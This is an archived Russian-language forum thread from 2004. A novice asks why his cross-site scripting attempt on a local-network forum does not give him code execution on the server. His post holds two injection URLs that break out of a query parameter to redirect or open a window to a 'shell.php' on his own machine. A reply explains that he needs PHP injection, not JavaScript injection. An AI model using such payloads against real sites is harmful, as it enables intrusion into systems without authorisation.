PDA

Просмотр полной версии : Межсайтовый вызов скрипта


ProTeuS
26.11.2004, 05:00
Хай, пиплс!
Помогите нубу разобраться...

Пытаюсь удаленно обращаться с форума в локалке на скрипт на своей та4ке и хз 4е не выходит =(


http://10.8.1.207/showforum.php?fid="><script>location.href="http://10.8.1.119/shell.php"</script>
или
http://10.8.1.207/showforum.php?fid="><script>window.open("http://10.8.1.119/shell.php")</script>

Может я в 4ем-то не врубаюсь, но этот код выполняется с правами клиента в моем браузере, а как замутить, 4тобы он исполнялся с правами системы на машине форума???

Algol
26.11.2004, 18:14
[QUOTE]как замутить, 4тобы он исполнялся с правами системы на машине форумаВ данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.

ProTeuS
27.11.2004, 03:24
[QUOTE]В данном случае никак, поскольку ты описываешь javascript-injection, а тебе нужно php-injection.
Сенкс, теперь более-менее разобрался...